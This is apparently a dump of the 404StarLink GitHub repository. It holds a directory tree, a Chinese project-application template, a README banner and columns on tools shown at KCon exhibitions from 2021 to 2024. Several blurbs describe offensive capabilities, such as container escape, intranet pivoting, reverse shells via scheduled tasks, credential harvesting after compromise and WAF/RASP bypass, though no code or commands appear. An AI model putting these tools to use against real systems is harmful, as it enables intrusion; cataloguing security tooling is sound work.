├── .github └── ISSUE_TEMPLATE │ └── application.yml ├── Images ├── logo.png ├── milestone_horizontal.jpg ├── milestone_prizes.png ├── operation_wechat.jpg └── question-and-answer.png ├── README.md ├── allprojects.md ├── banner.md ├── column ├── 2021KCon_exhibition_with_starlink.md ├── 2022KCon_exhibition_with_starlink.md ├── 2023KCon_exhibition_with_starlink.md ├── 2024KCon_exhibition_with_starlink.md ├── Images_2021KCon │ ├── 1.jpeg │ ├── 2.jpeg │ ├── cdk.png │ ├── f8x.png │ ├── gshark.png │ ├── kunlun.png │ ├── kunyu.png │ ├── pocassist.jpg │ ├── stowaway.png │ └── viper.jpg ├── Images_2022KCon │ ├── 1.png │ └── 2.png ├── Images_2023KCon │ ├── 1.jpeg │ ├── 2.png │ ├── cf.png │ ├── enscango.png │ └── hades.png ├── Images_2024KCon │ ├── 1.jpg │ ├── 2.png │ ├── jyso.png │ └── pillager.png └── starlink_project_video.md ├── detail ├── AiPy.md ├── Antenna.md ├── AppInfoScanner.md ├── AppScan.md ├── As-Exploits.md ├── BinAbsInspector.md ├── BurpCrypto.md ├── CDK.md ├── Cloud-Bucket-Leak-Detection-Tools.md ├── CodeReviewTools.md ├── Cola-Dnslog.md ├── DNSlog-GO.md ├── ENScanGo.md ├── Elkeid.md ├── Glass.md ├── GrabAccess.md ├── HaE.md ├── HackBrowserData.md ├── Hades.md ├── Heimdallr.md ├── JYso.md ├── Juggler.md ├── KunLun-M.md ├── Kunpeng.md ├── Kunyu.md ├── LBot.md ├── LSpider.md ├── MDUT.md ├── MySQL-Fake-Server.md ├── MySQLMonitor.md ├── MysqlT.md ├── OpenStar.md ├── Pillager.md ├── Platypus.md ├── Pocassist.md ├── PortForward.md ├── Redis-Rogue-Server.md ├── ServerScan.md ├── Stowaway.md ├── Tai-e.md ├── WMIHACKER.md ├── ZoomEye-Python.md ├── ZoomEye-Tools.md ├── ZoomEye-go.md ├── afrog.md ├── antSword.md ├── appshark.md ├── camille.md ├── ct.md ├── dperf.md ├── f8x.md ├── frida-skeleton.md ├── fscan.md ├── g3proxy.md ├── gshark.md ├── java-object-searcher.md ├── js-cookie-monitor-debugger-hook.md ├── ksubdomain.md ├── linglong.md ├── murphysec.md ├── myscan.md ├── passive-scan-client.md ├── pocsuite3.md ├── qscan.md ├── rakshasa.md ├── scaninfo.md ├── shellcodeloader.md ├── vArmor.md ├── veinmind-tools.md ├── vultrap.md ├── wam.md ├── xtate.md └── ysomap.md ├── information_analysis.md ├── intranet_tools.md ├── others.md ├── party_a.md ├── penetration_test.md ├── reconnaissance.md └── vulnerability_assessment.md /.github/ISSUE_TEMPLATE/application.yml: -------------------------------------------------------------------------------- 1 | name: 项目申请 2 | description: 使用此表单填写项目申请 3 | title: "[项目申请]: " 4 | body: 5 | - type: checkboxes 6 | id: requirements 7 | attributes: 8 | label: 基本要求 9 | description: 欢迎申请加入星链计划,请先判断是否符合以下条件 10 | options: 11 | - label: "1. 项目完全开源并遵守开源协议" 12 | required: true 13 | - label: "2. 项目提供README等项目描述" 14 | required: true 15 | - label: "3. 项目属于计算机安全范畴" 16 | required: true 17 | - label: "4. 项目具备一定的实用价值" 18 | required: true 19 | - label: "5. 项目不包含恶意功能或源码" 20 | required: true 21 | - label: "6. 项目将会积极维护" 22 | required: true 23 | - type: input 24 | id: name 25 | attributes: 26 | label: 项目名称 27 | validations: 28 | required: true 29 | - type: input 30 | id: link 31 | attributes: 32 | label: 项目地址 33 | validations: 34 | required: true 35 | - type: textarea 36 | id: description 37 | attributes: 38 | label: 项目简介 39 | validations: 40 | required: true 41 | - type: textarea 42 | id: highlight 43 | attributes: 44 | label: 项目亮点 45 | validations: 46 | required: true 47 | - type: markdown 48 | attributes: 49 | value: | 50 | 感谢申请加入 404 星链计划,我们将于 7 个工作日审核并回复,如有疑问可联系运营 WeChat:ks404team 51 | -------------------------------------------------------------------------------- /Images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/Images/logo.png -------------------------------------------------------------------------------- /Images/milestone_horizontal.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/Images/milestone_horizontal.jpg -------------------------------------------------------------------------------- /Images/milestone_prizes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/Images/milestone_prizes.png -------------------------------------------------------------------------------- /Images/operation_wechat.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/Images/operation_wechat.jpg -------------------------------------------------------------------------------- /Images/question-and-answer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/Images/question-and-answer.png -------------------------------------------------------------------------------- /banner.md: -------------------------------------------------------------------------------- 1 | ## Banner 2 | 3 | 开源作者收到星链计划邀请函后,希望开源作者可以添加星链计划 Banner 到项目 README 的末尾,这样可以极大增加星链计划的影响力。 4 | 5 | **中文版本** 6 | 7 | ``` 8 | ## 404星链计划 9 | 10 | 11 | (项目名称) 现已加入 [404星链计划](https://github.com/knownsec/404StarLink) 12 | ``` 13 | 14 | ## 404星链计划 15 | 16 | 17 | AAAA 现已加入 [404星链计划](https://github.com/knownsec/404StarLink) 18 | 19 | **英文版本** 20 | 21 | ``` 22 | ## 404Starlink 23 | 24 | 25 | (ProjectName) has joined [404Starlink](https://github.com/knownsec/404StarLink) 26 | ``` 27 | 28 | ## 404Starlink 29 | 30 | 31 | AAAA has joined [404Starlink](https://github.com/knownsec/404StarLink) -------------------------------------------------------------------------------- /column/2021KCon_exhibition_with_starlink.md: -------------------------------------------------------------------------------- 1 | ## 入选2021Kcon黑客大会兵器谱 2 | 3 | KCon 黑客大会由知道创宇主办,秉持着追求干货、乐于分享的精神,力求为每一位热爱黑客技术研究的伙伴打造一个尽情展示、互动交流的创意舞台。如今,历经十年打磨,KCon 黑客大会已成长为国际网络安全圈极富活力与影响力的前沿网络安全攻防技术交流平台。本届 KCon 选择以“纵横”为主题,十之一纵一横,包罗万象,正如网络空间的攻与防,变幻莫测。而纵横之下的这场网安论道,将以打造全球性网安交流平台为发展目标,加速强化中国网安力量。 4 | 5 |
6 | 7 |
8 | 9 | 详情可以访问: 10 | 11 | 为了鼓励国内安全自动化工具的发展,展示更多黑客及安全人员们的安全自动化研究成果,自 2016年 起,KCon 黑客大会便引入「兵器谱」展示环节。过去几届 KCon 黑客大会现场,已有三十多件“安全神兵利器”受到千余名参会黑客的观摩与试用,并获得媒体朋友们的广泛关注。 12 | 13 | 今年,在历时两个多月的招募与评选后,我们精心为大家挑选出了 11 件安全江湖的“神兵利器”,将于 KCon 现场尽情探索与展示! 14 | 15 |
16 | 17 |
18 | 19 | 详情可以访问: 20 | 21 | 在今年的兵器谱中,星链计划有大量的项目内推投稿到兵器谱,其中有 8 件安全江湖的“神兵利器”入选,他们是: 22 | 23 | * [CDK](#cdk) 24 | * [Kunyu](#kunyu) 25 | * [f8x](#f8x) 26 | * [Viper](#viper) 27 | * [KunLun-M](#kunlun-m) 28 | * [Pocassist](#pocassist) 29 | * [Stowaway](#stowaway) 30 | * [GShark](#gshark) 31 | 32 | >排名不分先后 33 | 34 | ---------------------------------------- 35 | 36 | ### [CDK](../detail/CDK.md) 37 | ![Author](https://img.shields.io/badge/Author-cdkteam-orange) 38 | ![Language](https://img.shields.io/badge/Language-CDK-blue) 39 | ![GitHub stars](https://img.shields.io/github/stars/cdk-team/CDK.svg?style=flat&logo=github) 40 | 41 | 42 | 43 | CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的逃逸、横向移动、持久化利用方式,插件化管理。 44 | 45 |
46 | 47 |
48 | 49 | 50 | ### [Kunyu](../detail/Kunyu.md) 51 | ![Author](https://img.shields.io/badge/Author-风起-orange) 52 | ![Language](https://img.shields.io/badge/Language-Python-blue) 53 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/Kunyu.svg?style=flat&logo=github) 54 | 55 | 56 | 57 | Kunyu 是基于 ZoomEye 开发的工具,旨在让企业资产梳理更加高效,使更多安全从业者了解、使用网络空间测绘技术。 58 | 59 |
60 | 61 |
62 | 63 | 64 | ### [f8x](../detail/f8x.md) 65 | ![Author](https://img.shields.io/badge/Author-ffffffff0x-orange) 66 | ![Language](https://img.shields.io/badge/Language-Bash-blue) 67 | ![GitHub stars](https://img.shields.io/github/stars/ffffffff0x/f8x.svg?style=flat&logo=github) 68 | 69 | 70 | 71 | 一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等。 72 | 73 |
74 | 75 |
76 | 77 | 78 | ### [Viper](../detail/Viper.md) 79 | ![Author](https://img.shields.io/badge/Author-FunnyWolf-orange) 80 | ![Language](https://img.shields.io/badge/Language-JS/Python-blue) 81 | ![GitHub stars](https://img.shields.io/github/stars/FunnyWolf/Viper.svg?style=flat&logo=github) 82 | 83 | 84 | 85 | VIPER是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化。 86 | 87 |
88 | 89 |
90 | 91 | 92 | ### [KunLun-M](../detail/KunLun-M.md) 93 | ![Author](https://img.shields.io/badge/Author-LoRexxar-orange) 94 | ![Language](https://img.shields.io/badge/Language-Python-blue) 95 | ![GitHub stars](https://img.shields.io/github/stars/FunnyWolf/Viper.svg?style=flat&logo=github) 96 | 97 | 98 | 99 | Kunlun-Mirror 专注于安全研究人员使用的白盒代码审计工具 100 | 101 |
102 | 103 |
104 | 105 | 106 | ### [Pocassist](../detail/Pocassist.md) 107 | ![Author](https://img.shields.io/badge/Author-jweny-orange) 108 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 109 | ![GitHub stars](https://img.shields.io/github/stars/jweny/pocassist.svg?style=flat&logo=github) 110 | 111 | 112 | 113 | Pocassist 是一个 Golang 编写的全新开源漏洞测试框架,帮助安全人员专注于漏洞验证的逻辑的实现。Pocassist 提供了简洁的 Web 图形化界面,用户可以在线编辑漏洞验证程序即可进行批量的测试;规则完全兼容 xray,可以直接使用现有开源的 PoC 库,同时也支持添加自定义规则。 114 | 115 |
116 | 117 |
118 | 119 | 120 | ### [Stowaway](../detail/Stowaway.md) 121 | ![Author](https://img.shields.io/badge/Author-ph4ntonn-orange) 122 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 123 | ![GitHub stars](https://img.shields.io/github/stars/ph4ntonn/Stowaway.svg?style=flat&logo=github) 124 | 125 | 126 | 127 | Stowaway 是一款多级代理工具,可将外部流量通过多个节点代理至内网,突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃,从外部dmz等一系列区域逐步深入核心网络;Stowaway 除了流量转发功能,还提供了端口复用、ssh隧道,流量伪装等专为渗透测试人员所用的功能。 128 | 129 |
130 | 131 |
132 | 133 | 134 | ### [GShark](../detail/gshark.md) 135 | ![Author](https://img.shields.io/badge/Author-madneal-orange) 136 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 137 | ![GitHub stars](https://img.shields.io/github/stars/madneal/gshark.svg?style=flat&logo=github) 138 | 139 | 140 | 141 | 一款开源敏感信息监测系统,可以监测包括 github、gitlab(目前不太稳定,由于gitlab对于免费用户不提供代码全文检索API)、searchcode 多平台的敏感信息监测。 142 | 143 |
144 | 145 |
146 | -------------------------------------------------------------------------------- /column/2022KCon_exhibition_with_starlink.md: -------------------------------------------------------------------------------- 1 | ## 入选2022KCon黑客大会兵器谱 2 | 3 | 2022年是 KCon 黑客大会举办的第11个年头,亦是10年圆满后踏上新征程的第1步,主题为“**+1 进阶,护航未来**”。 4 | 5 | “+1”或许并不起眼,但“不积跬步,无以至千里;不积小流,无以成江海”。众多“+1”汇聚,便能以量变引起质变,化不可能为可能。网络空间发展至今,机遇与威胁并存,攻击与防守互搏。护航网络空间的未来发展之路,需要聚力成盾,这凝聚着安全技术人员每一次 **“+1”的修复、“+1”的努力、“+1”的创新、“+1”的突破**。 6 | 7 | KCon黑客大会,汇聚黑客智慧,专注网络攻防技术交流。我们希望为众多“+1”的探索者提供分享与碰撞的舞台,为网络安全的进阶助力。 8 | 9 |
10 | 11 |
12 | 13 | 详情访问:[KCon 2022 - KCon 黑客大会](https://kcon.knownsec.com/list-kcon2022.html) 14 | 15 | 众所周知,网络实战攻防离不开各类自动化工具的运用。安全自动化工具是网安研究人员脑力和经验的结晶,它的加持能让安全人员从“白打”升级到全副武装状态,帮助展示及处理诸多复杂、耗时的安全问题,明确风险、提升效率、加强防御。 16 | 17 | KCon「兵器谱」展示便是为鼓励国内安全自动化工具的发展而设立,现已成为每届 KCon 的传统。本届 KCon,有**14**件经过精心筛选的安全“兵器”等待大家探索。 18 | 19 |
20 | 21 |
22 | 23 | 其中有 7 个项目来自404星链计划,他们分别是: 24 | 25 | - AppInfoScanner 26 | - As-Exploits 27 | - Cloud-Bucket-Leak-Detection-Tools 28 | - fscan 29 | - HaE 30 | - openstar 31 | - veinmind-tools 32 | 33 | >排名不分先后 34 | 35 | 36 | ### [AppInfoScanner](https://github.com/knownsec/404StarLink/blob/master/detail/AppInfoScanner.md) 37 | 38 | ![Language](https://img.shields.io/badge/Language-Python-blue) 39 | ![Author](https://img.shields.io/badge/Author-kelvinBen-orange) 40 | ![GitHub stars](https://img.shields.io/github/stars/kelvinBen/AppInfoScanner.svg?style=flat&logo=github) 41 | ![Version](https://img.shields.io/badge/Version-V1.0.8-red) 42 | 43 | https://github.com/kelvinBen/AppInfoScanner 44 | 45 | 一款适用于以HW行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如:Title、Domain、CDN、指纹信息、状态信息等。 46 | 47 | [点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1Mt4y1J7Vh?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047) 48 | 49 | 50 | ### [As-Exploits](https://github.com/knownsec/404StarLink/blob/master/detail/As-Exploits.md) 51 | 52 | ![Author](https://img.shields.io/badge/Author-yzddmr6-orange) 53 | ![Language](https://img.shields.io/badge/Language-JavaScript-blue) 54 | ![GitHub stars](https://img.shields.io/github/stars/yzddmr6/As-Exploits.svg?style=flat&logo=github) 55 | ![Version](https://img.shields.io/badge/Version-V1.0.0-red) 56 | 57 | https://github.com/yzddmr6/As-Exploits 58 | 59 | 中国蚁剑后渗透框架 60 | 61 | 62 | ### [Cloud-Bucket-Leak-Detection-Tools](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools) 63 | 64 | ![Author](https://img.shields.io/badge/Author-UzJu-orange) 65 | ![Language](https://img.shields.io/badge/Language-Python-blue) 66 | ![GitHub stars](https://img.shields.io/github/stars/UzJu/Cloud-Bucket-Leak-Detection-Tools.svg?style=flat&logo=github) 67 | ![Version](https://img.shields.io/badge/Version-V0.4.0-red) 68 | 69 | https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools 70 | 71 | 云原生安全近几年比较火,存储桶在企业(SRC众测)中暴露的问题也非常多,不仅仅局限于AK/SK的泄露,更多的是用户配置侧的问题,这款工具就是用来代替我们手工解决一些繁琐的操作。 72 | 73 | [点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1ye411g76v?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047) 74 | 75 | 76 | ### [fscan](https://github.com/knownsec/404StarLink/blob/master/detail/fscan.md) 77 | 78 | ![Author](https://img.shields.io/badge/Author-shadow1ng-orange) 79 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 80 | ![GitHub stars](https://img.shields.io/github/stars/shadow1ng/fscan.svg?style=flat&logo=github) 81 | ![Version](https://img.shields.io/badge/Version-V1.8.1-red) 82 | 83 | https://github.com/shadow1ng/fscan 84 | 85 | 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 86 | 87 | [点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1vG4115722?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047) 88 | 89 | 90 | ### [HaE](https://github.com/knownsec/404StarLink/blob/master/detail/HaE.md) 91 | 92 | ![Author](https://img.shields.io/badge/Author-gh0stkey-orange) 93 | ![Language](https://img.shields.io/badge/Language-Java-blue) 94 | ![GitHub stars](https://img.shields.io/github/stars/gh0stkey/HaE.svg?style=flat&logo=github) 95 | ![Version](https://img.shields.io/badge/Version-V2.4.2-red) 96 | 97 | https://github.com/gh0stkey/HaE 98 | 99 | HaE是一款可以快速挖掘目标指纹和关键信息的Burp插件。 100 | 101 | [点击查看兵器谱视频演示](https://www.bilibili.com/video/BV16D4y167uX?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047) 102 | 103 | 104 | ### [OpenStar](https://github.com/knownsec/404StarLink/blob/master/detail/OpenStar.md) 105 | 106 | ![Author](https://img.shields.io/badge/Author-starjun-orange) 107 | ![Language](https://img.shields.io/badge/Language-JS/Python-blue) 108 | ![GitHub stars](https://img.shields.io/github/stars/starjun/openstar.svg?style=flat&logo=github) 109 | ![Version](https://img.shields.io/badge/Version-V1.0.0-red) 110 | 111 | https://github.com/starjun/openstar 112 | 113 | OpenStar 是一个基于 OpenResty 的高性能 Web 应用防火墙,支持复杂规则编写。提供了常规的 HTTP 字段规则配置,还提供了 IP 黑白名单、访问频次等配置,对于 CC 防护更提供的特定的规则算法,并且支持搭建集群进行防护。 114 | 115 | [点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1YB4y1G7mr?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047) 116 | 117 | 118 | ### [veinmind-tools](https://github.com/knownsec/404StarLink/blob/master/detail/veinmind-tools.md) 119 | 120 | ![Author](https://img.shields.io/badge/Author-长亭科技-orange) 121 | ![Language](https://img.shields.io/badge/Language-Golang/Python-blue) 122 | ![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools.svg?style=flat&logo=github) 123 | ![Version](https://img.shields.io/badge/Version-V1.5.0-red) 124 | 125 | https://github.com/chaitin/veinmind-tools 126 | 127 | veinmind-tools 是基于 veinmind-sdk 打造的一个容器安全工具集,目前已支持镜像 恶意文件/后门/敏感信息/弱口令 的扫描,更多功能正在逐步开发中。 128 | 129 | [点击查看兵器谱视频演示](https://www.bilibili.com/video/BV1MP411V7v6?spm_id_from=333.999.0.0&vd_source=43f31648998a33a14a20b812fed90047) 130 | -------------------------------------------------------------------------------- /column/2023KCon_exhibition_with_starlink.md: -------------------------------------------------------------------------------- 1 | ## 入选2023KCon黑客大会兵器谱 2 | 3 | KCon大会,国际网络安全圈富有活力与影响力的前沿网络安全攻防技术交流平台,以“追求干货有趣”为宗旨,力求为网安技术研究者们打造一个尽情展示、尽情交流的创意舞台,期待以技术之力引领业界未来的变革。 4 | 5 | 在数字化浪潮奔腾汹涌的当下,数字的汇聚引起AI的“智变”,也引起了更多值得被关注的网络安全风险。安全是发展的前提,网络安全技术的创新与进步是数字中国建设的重要支撑。 6 | 7 | 因此,本届KCon大会着眼数智时代的网安风险,以 **“归源·智变”** 为主题,意在以技术初心凝聚行业之力,为护航数智时代的安全发展贡献绵薄之力。 8 | 9 |
10 | 11 |
12 | 13 | 详情访问:[KCon 2023 - KCon 黑客大会](https://kcon.knownsec.com/list-kcon2023.html) 14 | 15 | 网络空间的实战攻防离不开各类自动化工具的运用。这些工具就如同网安战场上的“兵器”,可以为安全人员进行“全副武装”,帮助展示及处理诸多复杂、耗时的安全问题,明确风险、提升效率、加强防御。 16 | 17 | AI大模型的横空出世,带来了新一轮技术工具的进化热潮,网络安全行业也纷纷跟进。KCon一直聚焦当下前沿的研究方向与工具技术,「兵器谱」展示环节便是为了鼓励国内安全自动化工具发展而设立。 18 | 19 | 在KCon 2023的大会现场,10件由大众评选出的安全神兵利器将同台亮相展区,等待大家的探索。“锻造”出这些“兵器”的网安巧匠也将在展示区为大家讲解演示,传授使用“秘籍”。 20 | 21 |
22 | 23 |
24 | 25 | 其中有 3 个项目来自404星链计划,他们分别是: 26 | 27 | - Hades 28 | - ENScanGo 29 | - CF 30 | 31 | >排名不分先后 32 | 33 | ### [Hades](https://github.com/knownsec/404StarLink/blob/master/detail/Hades.md) 34 | 35 | ![Language](https://img.shields.io/badge/Language-Golang&C++&C-blue) 36 | ![Author](https://img.shields.io/badge/Author-theSecHunter-orange) 37 | ![GitHub stars](https://img.shields.io/github/stars/theSecHunter/Hades.svg?style=flat&logo=github) 38 | 39 | https://github.com/theSecHunter/Hades 40 | 41 | Hades 是一款支持 Windows/Linux 的内核级别数据采集主机入侵检测系统,其中每个插件均可独立分开运行。 42 | 43 |
44 | 45 |
46 | 47 | ### [ENScanGo](https://github.com/knownsec/404StarLink/blob/master/detail/ENScanGo.md) 48 | 49 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 50 | ![Author](https://img.shields.io/badge/Author-wgpsec-orange) 51 | ![GitHub stars](https://img.shields.io/github/stars/wgpsec/ENScan_GO.svg?style=flat&logo=github) 52 | 53 | https://github.com/wgpsec/ENScan_GO 54 | 55 | 剑指HW/SRC,解决在HW/SRC场景下遇到的各种针对国内企业信息收集难题。 56 | 57 |
58 | 59 |
60 | 61 | ### [CF](https://github.com/knownsec/404StarLink/blob/master/detail/cf.md) 62 | 63 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 64 | ![Author](https://img.shields.io/badge/Author-teamssix-orange) 65 | ![GitHub stars](https://img.shields.io/github/stars/teamssix/cf.svg?style=flat&logo=github) 66 | 67 | https://github.com/teamssix/cf 68 | 69 | CF 是一个云环境利用框架,适用于在红队场景中对云上内网进行横向、SRC 场景中对 Access Key 即访问凭证的影响程度进行判定、企业场景中对自己的云上资产进行自检等等。 70 | 71 |
72 | 73 |
-------------------------------------------------------------------------------- /column/2024KCon_exhibition_with_starlink.md: -------------------------------------------------------------------------------- 1 | ## 入选2024KCon黑客大会兵器谱 2 | 3 | KCon 黑客大会,知道创宇出品,始终秉承“追求干货、有趣”的理念,打造开放的网络安全攻防技术交流平台,“汇聚全球黑客的智慧”是 KCon 黑客大会的一贯宗旨。 4 | 5 | 本次大会,我们将如鹰击长空般探索人工智能在网络安全中的无限可能,揭开其神秘面纱,共享技术突破带来的绚烂光芒;本次大会,我们将汇聚全球黑客的智慧如百川归海,见证新质生产力如雨后春笋般崛起,为网络安全的未来绘制宏伟蓝图;本次大会,我们将凝聚十三载的辉煌成果,以归零的勇气和决心,再次踏上“技术突破如破竹、边界探索似探险、安全极致胜巅峰”的崭新征程,共同书写网络安全的新篇章! 6 | 7 | 本届大会以 **“同道”** 为主题,汇聚了网络安全领域的精英与志同道合之士,共谋网络安全之道,携手开创行业未来发展蓝图。 8 | 9 |
10 | 11 |
12 | 13 | 详情访问:[KCon 2024 - KCon 黑客大会](https://kcon.knownsec.com/list-kcon2024.html) 14 | 15 | 为了鼓励国内安全自动化工具的发展,展示更多安全人员们的安全自动化研究成果,自2016年起,KCon黑客大会便引入「兵器谱」展示环节。 16 | 17 | 过去几届 KCon 黑客大会现场,已有七十多件“安全神兵利器”受到千余名参会者的观摩与试用,并获得媒体朋友们的广泛关注。 18 | 19 | 今年,我们为大家精心挑选出了7件安全江湖的“神兵利器”,将于KCon舞台尽情探索与展示! 20 | 21 |
22 | 23 |
24 | 25 | 其中有 2 个项目来自404星链计划,他们分别是: 26 | 27 | - [Pillager](https://github.com/qwqdanchun/Pillager) 28 | - [JYso](https://github.com/qi4L/JYso) 29 | 30 | >排名不分先后 31 | 32 | ### [Pillager](https://github.com/knownsec/404StarLink/blob/master/detail/Pillager.md) 33 | 34 | ![Language](https://img.shields.io/badge/Language-C#-blue) 35 | ![Author](https://img.shields.io/badge/Author-qwqdanchun-orange) 36 | ![GitHub stars](https://img.shields.io/github/stars/qwqdanchun/Pillager.svg?style=flat&logo=github) 37 | 38 | https://github.com/qwqdanchun/Pillager 39 | 40 | Pillager是一个适用于后渗透期间的信息收集工具,可以收集目标机器上敏感信息,方便下一步渗透工作的进行。 41 | 42 |
43 | 44 |
45 | 46 | ### [JYso](https://github.com/knownsec/404StarLink/blob/master/detail/JYso.md) 47 | 48 | ![Language](https://img.shields.io/badge/Language-Java-blue) 49 | ![Author](https://img.shields.io/badge/Author-qi4L-orange) 50 | ![GitHub stars](https://img.shields.io/github/stars/qi4L/JYso.svg?style=flat&logo=github) 51 | 52 | https://github.com/qi4L/JYso 53 | 54 | JYso 是一款可以同时当做 ysoserial 与 JNDIExploit 使用的工具,同时具备多种 JNDI 高版本、WAF、RASP 的 Bypass 功能。 55 | 56 |
57 | 58 |
-------------------------------------------------------------------------------- /column/Images_2021KCon/1.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2021KCon/1.jpeg -------------------------------------------------------------------------------- /column/Images_2021KCon/2.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2021KCon/2.jpeg -------------------------------------------------------------------------------- /column/Images_2021KCon/cdk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2021KCon/cdk.png -------------------------------------------------------------------------------- /column/Images_2021KCon/f8x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2021KCon/f8x.png -------------------------------------------------------------------------------- /column/Images_2021KCon/gshark.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2021KCon/gshark.png -------------------------------------------------------------------------------- /column/Images_2021KCon/kunlun.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2021KCon/kunlun.png -------------------------------------------------------------------------------- /column/Images_2021KCon/kunyu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2021KCon/kunyu.png -------------------------------------------------------------------------------- /column/Images_2021KCon/pocassist.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2021KCon/pocassist.jpg -------------------------------------------------------------------------------- /column/Images_2021KCon/stowaway.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2021KCon/stowaway.png -------------------------------------------------------------------------------- /column/Images_2021KCon/viper.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2021KCon/viper.jpg -------------------------------------------------------------------------------- /column/Images_2022KCon/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2022KCon/1.png -------------------------------------------------------------------------------- /column/Images_2022KCon/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2022KCon/2.png -------------------------------------------------------------------------------- /column/Images_2023KCon/1.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2023KCon/1.jpeg -------------------------------------------------------------------------------- /column/Images_2023KCon/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2023KCon/2.png -------------------------------------------------------------------------------- /column/Images_2023KCon/cf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2023KCon/cf.png -------------------------------------------------------------------------------- /column/Images_2023KCon/enscango.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2023KCon/enscango.png -------------------------------------------------------------------------------- /column/Images_2023KCon/hades.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2023KCon/hades.png -------------------------------------------------------------------------------- /column/Images_2024KCon/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2024KCon/1.jpg -------------------------------------------------------------------------------- /column/Images_2024KCon/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2024KCon/2.png -------------------------------------------------------------------------------- /column/Images_2024KCon/jyso.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/knownsec/404StarLink/01f90c1faa1c5a7a2c0577484ec282a1d3896697/column/Images_2024KCon/jyso.png -------------------------------------------------------------------------------- 